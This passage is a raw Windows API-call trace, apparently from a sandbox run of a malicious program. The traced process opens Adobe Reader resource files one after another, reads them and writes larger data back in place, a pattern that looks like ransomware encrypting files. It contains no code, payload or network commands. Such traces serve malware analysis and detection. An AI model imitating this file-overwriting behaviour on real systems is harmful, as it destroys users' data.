Mail\\en-US\\WinMail.exe.mui", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui", lpFilePart=0x331f690*="WinMail.exe.mui") returned 0x33 [0076.655] GetLastError () returned 0x5 [0076.655] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0076.656] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.656] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.656] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.656] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.657] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files\\windows mail\\en-us\\winmail.exe.mui")) returned 0x20 [0076.657] CreateFileW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files\\windows photo viewer\\imagingdevices.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe", lpFilePart=0x331f690*="ImagingDevices.exe") returned 0x38 [0076.659] GetLastError () returned 0x5 [0076.659] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0076.659] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.659] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.659] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0076.659] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.660] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0076.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files\\windows photo viewer\\imagingdevices.exe")) returned 0x20 [0076.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0076.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4288 [0076.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0076.661] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.661] ReleaseMutex (hMutex=0x168) returned 1 [0076.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IrakHau.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IrakHau.htm", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IrakHau.htm", lpUsedDefaultChar=0x0) returned 11 [0076.662] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e958a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.075] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3288 [0077.075] ReadFile (in: hFile=0x1d8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.075] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3288 [0077.075] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.076] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0077.076] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.076] CloseHandle (hObject=0x1d8) returned 1 [0077.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.078] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.078] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x434e [0077.078] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.079] ReleaseMutex (hMutex=0x168) returned 1 [0077.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LueMinut.htm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LueMinut.htm", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LueMinut.htm", lpUsedDefaultChar=0x0) returned 12 [0077.079] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.081] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x334e [0077.082] ReadFile (in: hFile=0x1d8, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.082] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x334e [0077.083] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.083] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0077.083] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.083] CloseHandle (hObject=0x1d8) returned 1 [0077.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.084] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.085] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e00 [0077.085] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.085] ReleaseMutex (hMutex=0x168) returned 1 [0077.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CAT", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CAT", lpUsedDefaultChar=0x0) returned 11 [0077.086] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0077.089] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.089] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0077.090] CloseHandle (hObject=0x1d8) returned 1 [0077.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.091] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.091] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0077.091] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.091] ReleaseMutex (hMutex=0x168) returned 1 [0077.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.FRA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.FRA", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.FRA", lpUsedDefaultChar=0x0) returned 11 [0077.091] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0077.095] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.096] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0077.096] CloseHandle (hObject=0x1d8) returned 1 [0077.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.097] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.097] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2000 [0077.098] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.098] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.098] ReleaseMutex (hMutex=0x168) returned 1 [0077.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.POL", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.POL", lpUsedDefaultChar=0x0) returned 11 [0077.098] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0077.100] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.100] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0077.101] CloseHandle (hObject=0x1d8) returned 1 [0077.101] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.101] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.101] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e00 [0077.101] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.102] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.102] ReleaseMutex (hMutex=0x168) returned 1 [0077.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.TUR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.TUR", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.TUR", lpUsedDefaultChar=0x0) returned 11 [0077.102] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0077.103] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.104] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0077.104] CloseHandle (hObject=0x1d8) returned 1 [0077.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.105] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.105] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e00 [0077.105] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.105] ReleaseMutex (hMutex=0x168) returned 1 [0077.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ESP", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.ESP", lpUsedDefaultChar=0x0) returned 11 [0077.105] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0077.107] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.107] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0077.108] CloseHandle (hObject=0x1d8) returned 1 [0077.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0077.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e00 [0077.109] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.110] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.110] ReleaseMutex (hMutex=0x168) returned 1 [0077.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NLD", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.NLD", lpUsedDefaultChar=0x0) returned 11 [0077.110] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e954d8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e954d8*, lpNumberOfBytesRead=0x331f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0077.111] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0077.112] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0077.112] CloseHandle (hObject=0x1d8) returned 1 [0077.112] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0077.451] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.451] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e00 [0077.452] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0077.452] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.014] ReleaseMutex (hMutex=0x168) returned 1 [0078.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SUO", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SUO", lpUsedDefaultChar=0x0) returned 11 [0078.015] ReadFile (in: hFile=0x204, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x331f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0078.024] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0078.024] WriteFile (in: hFile=0x204, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x2388, 